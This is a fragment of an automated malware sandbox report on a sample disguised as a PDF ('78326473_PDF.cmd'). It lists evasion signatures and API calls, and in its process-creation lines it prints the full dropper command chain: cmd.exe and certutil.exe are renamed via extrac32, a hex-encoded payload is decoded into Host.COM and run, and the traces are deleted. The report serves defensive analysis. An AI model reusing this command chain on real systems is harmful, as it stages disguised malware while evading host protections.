Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Allocates many large memory junks

Source: C:\Users\Public\Libraries\Host.COM	Memory allocated: 2AA0000 memory commit 450007040	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Memory allocated: 2AA1000 memory commit 450179072	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Memory allocated: 2ACD000 memory commit 450002944	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Memory allocated: 2ACE000 memory commit 450351104	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Memory allocated: 2B24000 memory commit 451014656	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Memory allocated: 2C1E000 memory commit 450015232	Jump to behavior

Source: C:\Users\Public\alpha.exe	API coverage: 8.3 %
Source: C:\Users\Public\alpha.exe	API coverage: 8.6 %
Source: C:\Users\Public\kn.exe	API coverage: 0.8 %

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF71967823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	4_2_00007FF71967823C
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF719672978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	4_2_00007FF719672978
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF719661560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	4_2_00007FF719661560
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF7196635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	4_2_00007FF7196635B8
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF719687B4C FindFirstFileW,FindNextFileW,FindClose,	4_2_00007FF719687B4C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF71967823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	6_2_00007FF71967823C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF719672978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	6_2_00007FF719672978
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF719661560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	6_2_00007FF719661560
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF7196635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	6_2_00007FF7196635B8
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF719687B4C FindFirstFileW,FindNextFileW,FindClose,	6_2_00007FF719687B4C
Source: C:\Users\Public\kn.exe	Code function: 7_2_00007FF68AD16F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,	7_2_00007FF68AD16F80
Source: C:\Users\Public\kn.exe	Code function: 7_2_00007FF68AD13100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,	7_2_00007FF68AD13100
Source: C:\Users\Public\kn.exe	Code function: 7_2_00007FF68AD110C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,	7_2_00007FF68AD110C4
Source: C:\Users\Public\kn.exe	Code function: 7_2_00007FF68AD1234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,	7_2_00007FF68AD1234C
Source: C:\Users\Public\kn.exe	Code function: 7_2_00007FF68ACAC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,	7_2_00007FF68ACAC6F8
Source: C:\Users\Public\kn.exe	Code function: 7_2_00007FF68ACBDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,	7_2_00007FF68ACBDBC0
Source: C:\Users\Public\kn.exe	Code function: 7_2_00007FF68AD119F8 #359,FindFirstFileW,FindNextFileW,FindClose,	7_2_00007FF68AD119F8
Source: C:\Users\Public\kn.exe	Code function: 7_2_00007FF68AD11B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,	7_2_00007FF68AD11B04
Source: C:\Users\Public\kn.exe	Code function: 7_2_00007FF68ACB5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,	7_2_00007FF68ACB5E58
Source: C:\Users\Public\kn.exe	Code function: 7_2_00007FF68ACBB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,	7_2_00007FF68ACBB3D8
Source: C:\Users\Public\kn.exe	Code function: 7_2_00007FF68ACBD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,	7_2_00007FF68ACBD4A4
Source: C:\Users\Public\kn.exe	Code function: 7_2_00007FF68AC7D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,	7_2_00007FF68AC7D440
Source: C:\Users\Public\kn.exe	Code function: 7_2_00007FF68ACF3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,	7_2_00007FF68ACF3674
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02AA5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	11_2_02AA5908

Source: C:\Users\Public\kn.exe

Code function: 7_2_00007FF68ACF511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,

7_2_00007FF68ACF511C

Source: Host.COM, 0000000B.00000002.2573365210.00000000007DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: Host.COM, 0000000B.00000002.2573365210.000000000082B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\Public\Libraries\Host.COM

API call chain: ExitProcess graph end node

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\Public\Libraries\Host.COM

Code function: 11_2_02ABF740 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

11_2_02ABF740

Source: C:\Users\Public\Libraries\Host.COM

Process queried: DebugPort

Drops or copies certutil.exe with a different name (likely to bypass HIPS)

Source: C:\Users\Public\alpha.exe

Code function: 4_2_00007FF7196863FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

4_2_00007FF7196863FC

Source: C:\Users\Public\Libraries\Host.COM

Code function: 11_2_02AB8954 LoadLibraryW,GetProcAddress,FreeLibrary,

11_2_02AB8954

Source: C:\Users\Public\alpha.exe

Code function: 4_2_00007FF71967823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,

4_2_00007FF71967823C

Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF7196793B0 SetUnhandledExceptionFilter,	4_2_00007FF7196793B0
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF719678FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FF719678FA4
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF7196793B0 SetUnhandledExceptionFilter,	6_2_00007FF7196793B0
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF719678FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00007FF719678FA4
Source: C:\Users\Public\kn.exe	Code function: 7_2_00007FF68AD44E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00007FF68AD44E18
Source: C:\Users\Public\kn.exe	Code function: 7_2_00007FF68AD453E0 SetUnhandledExceptionFilter,	7_2_00007FF68AD453E0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\kn.exe

Jump to dropped file

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\alpha.exe

Jump to dropped file

Source: C:\Users\Public\kn.exe

Code function: 7_2_00007FF68ACF7024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,

7_2_00007FF68ACF7024

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\78326473_PDF.cmd" "C:\\Users\\Public\\Host.GIF" 3	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\Host.COM C:\Users\Public\Libraries\Host.COM	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\78326473_PDF.cmd" "C:\\Users\\Public\\Host.GIF" 3	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10	Jump to behavior

Source: C:\Users\Public\kn.exe

Code function: 7_2_00007FF68ACE4AF4 GetSecurityDescriptorDacl,GetLastError,SetEntriesInAclW,SetSecurityDescriptorDacl,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,

7_2_00007FF68ACE4AF4

Source: C:\Users\Public\kn.exe

Code function: 7_2_00007FF68ACE4E88 DsRoleGetPrimaryDomainInformation,#357,AllocateAndInitializeSid,GetLastError,#357,AllocateAndInitializeSid,GetLastError,#357,#357,DsRoleFreeMemory,LocalFree,#357,LocalFree,LocalFree,LocalFree,

7_2_00007FF68ACE4E88

Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	4_2_00007FF7196751EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	4_2_00007FF719666EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	4_2_00007FF719673140
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	6_2_00007FF7196751EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	6_2_00007FF719666EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	6_2_00007FF719673140
Source: C:\Users\Public\kn.exe	Code function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,	7_2_00007FF68AD43800
Source: C:\Users\Public\Libraries\Host.COM	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	11_2_02AA5ACC
Source: C:\Users\Public\Libraries\Host.COM	Code function: GetLocaleInfoA,	11_2_02AAA7CC
Source: C:\Users\Public\Libraries\Host.COM	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	11_2_02AA5BD8
Source: C:\Users\Public\Libraries\Host.COM	Code function: GetLocaleInfoA,	11_2_02AAA818

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

